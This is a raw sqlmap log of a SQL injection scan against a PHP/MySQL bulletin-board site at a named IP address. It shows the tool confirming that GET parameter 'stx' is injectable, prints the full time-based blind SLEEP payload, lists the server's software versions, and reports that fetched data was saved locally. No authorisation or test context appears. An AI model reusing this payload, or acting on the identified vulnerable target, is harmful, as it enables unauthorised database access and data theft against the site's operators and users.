[16:22:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:22:23] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[16:22:23] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[16:22:23] [INFO] checking if the injection point on GET parameter 'stx' is a false positive
GET parameter 'stx' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 3995 HTTP(s) requests:
---
Parameter: stx (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: bo_table=notice&sop=and&sst=wr_hit&sod=desc&sfl=test&stx=test'||(SELECT 0x62506878 WHERE 6948=6948 AND (SELECT 8159 FROM (SELECT(SLEEP(5)))vPbr))||'&sca=test&page=1
---
[16:22:57] [INFO] the back-end DBMS is MySQL
[16:22:57] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Debian
web application technology: PHP 7.4.33, Apache 2.4.54, PHP
back-end DBMS: MySQL >= 5.0.12
[16:22:59] [INFO] fetched data logged to text files under 'C:\Users\gudrh\AppData\Local\sqlmap\output\34.68.27.120'

[*] ending @ 16:22:59 /2026-05-26/

